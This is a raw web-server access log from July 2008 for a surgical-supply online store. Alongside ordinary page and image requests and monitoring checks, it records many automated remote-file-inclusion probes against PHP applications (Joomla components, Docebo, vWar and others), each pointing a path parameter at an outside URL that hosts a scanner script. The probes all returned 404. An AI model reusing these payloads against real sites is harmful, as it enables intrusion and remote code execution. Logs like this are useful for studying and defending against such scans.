64.252.49.82 - - [20/Jul/2008:07:52:49 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F16EA2D1462F3003E35051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.252.49.82 - - [20/Jul/2008:07:52:49 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F16EA2D1462F3003E35051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.252.49.82 - - [20/Jul/2008:07:52:49 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F16EA2D1462F3003E35051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.252.49.82 - - [20/Jul/2008:07:52:49 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F16EA2D1462F3003E35051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.252.49.82 - - [20/Jul/2008:07:52:49 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8F16EA2D1462F3003E35051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [20/Jul/2008:07:54:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.177.42.133 - - [20/Jul/2008:08:00:29 -0400] "GET /!scanhttp://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
203.177.42.133 - - [20/Jul/2008:08:00:29 -0400] "GET /logs/!scanhttp://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
208.80.193.45 - - [20/Jul/2008:08:04:41 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.6-standalone; rev1.6; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [20/Jul/2008:08:14:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.51.119.2 - - [20/Jul/2008:08:19:32 -0400] "GET /logs/error_log.Q108032600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://bolikowski.com/images/v6-id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
80.51.119.2 - - [20/Jul/2008:08:19:32 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://bolikowski.com/images/v6-id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
80.51.119.2 - - [20/Jul/2008:08:19:34 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://bolikowski.com/images/v6-id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2008:08:19:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.51.119.2 - - [20/Jul/2008:08:21:38 -0400] "GET /logs/error_log.Q108041200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://bolikowski.com/images/v6-id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2008:08:24:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.221.143.111 - - [20/Jul/2008:08:25:44 -0400] "GET //cgi-awstats/awstats.pl?lang=it&output=notfounderror//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
67.15.70.35 - - [20/Jul/2008:08:26:42 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
67.15.70.35 - - [20/Jul/2008:08:26:42 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
209.59.12.99 - - [20/Jul/2008:08:29:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:08:34:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.70.36.107 - - [20/Jul/2008:08:35:26 -0400] "GET /logs/error_log.Q108031900/convert/mvcw.php?step=1&vwar_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.70.36.107 - - [20/Jul/2008:08:35:27 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
195.70.36.107 - - [20/Jul/2008:08:35:27 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
195.70.36.107 - - [20/Jul/2008:08:35:47 -0400] "GET /logs/error_log.Q107113000/convert/mvcw.php?step=1&vwar_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.70.36.107 - - [20/Jul/2008:08:35:47 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
195.70.36.107 - - [20/Jul/2008:08:35:48 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
67.15.70.35 - - [20/Jul/2008:08:38:25 -0400] "GET /logs/index.php?redir=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.811"
67.15.70.35 - - [20/Jul/2008:08:38:25 -0400] "GET /index.php?redir=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.811"
209.59.12.99 - - [20/Jul/2008:08:39:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:08:44:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.221.143.111 - - [20/Jul/2008:08:46:28 -0400] "GET /logs/error_log.Q107060500//cgi-awstats/awstats.pl?lang=it&output=notfounderror//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
202.221.143.111 - - [20/Jul/2008:08:46:28 -0400] "GET /logs//cgi-awstats/awstats.pl?lang=it&output=notfounderror//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
209.59.12.99 - - [20/Jul/2008:08:49:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:08:54:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.29.87.80 - - [20/Jul/2008:08:57:52 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=[BiTcH]?? HTTP/1.1" 404 229 "-" "libwww-perl/5.808"
72.29.87.80 - - [20/Jul/2008:08:57:52 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=[BiTcH]?? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
209.59.12.99 - - [20/Jul/2008:08:59:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.169.158.65 - - [20/Jul/2008:09:01:00 -0400] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
81.169.158.65 - - [20/Jul/2008:09:01:00 -0400] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
81.169.158.65 - - [20/Jul/2008:09:02:52 -0400] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
81.169.158.65 - - [20/Jul/2008:09:02:52 -0400] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/Jul/2008:09:04:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:09:09:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.177.42.133 - - [20/Jul/2008:09:10:10 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
203.177.42.133 - - [20/Jul/2008:09:10:11 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
69.80.249.11 - - [20/Jul/2008:09:10:33 -0400] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
69.80.249.11 - - [20/Jul/2008:09:10:33 -0400] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://medisana.co.kr/test?? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
216.193.201.57 - - [20/Jul/2008:09:11:24 -0400] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.75"
216.193.201.57 - - [20/Jul/2008:09:11:24 -0400] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.75"
69.80.249.11 - - [20/Jul/2008:09:12:29 -0400] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
69.80.249.11 - - [20/Jul/2008:09:12:29 -0400] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
72.29.87.80 - - [20/Jul/2008:09:13:08 -0400] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
72.29.87.80 - - [20/Jul/2008:09:13:08 -0400] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
87.106.98.71 - - [20/Jul/2008:09:15:54 -0400] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.98.71 - - [20/Jul/2008:09:15:55 -0400] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
213.60.72.132 - - [20/Jul/2008:09:18:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:18:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:18:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:18:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
87.106.101.24 - - [20/Jul/2008:09:18:58 -0400] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.101.24 - - [20/Jul/2008:09:18:58 -0400] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
213.60.72.132 - - [20/Jul/2008:09:19:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75525 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:42 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:43 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:43 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:45 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:45 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:48 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:48 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:19:57 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
91.194.90.180 - - [20/Jul/2008:09:20:15 -0400] "GET /logs//guestbook/admin.php?include_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
91.194.90.180 - - [20/Jul/2008:09:20:15 -0400] "GET //guestbook/admin.php?include_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
213.60.72.132 - - [20/Jul/2008:09:20:17 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:22:36 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:22:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:22:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:22:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:36 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA HTTP/1.1" 200 37680 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:38 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:38 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:38 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:38 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:38 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:39 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:39 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:39 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:39 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
213.60.72.132 - - [20/Jul/2008:09:23:39 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ODA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; InfoPath.2)"
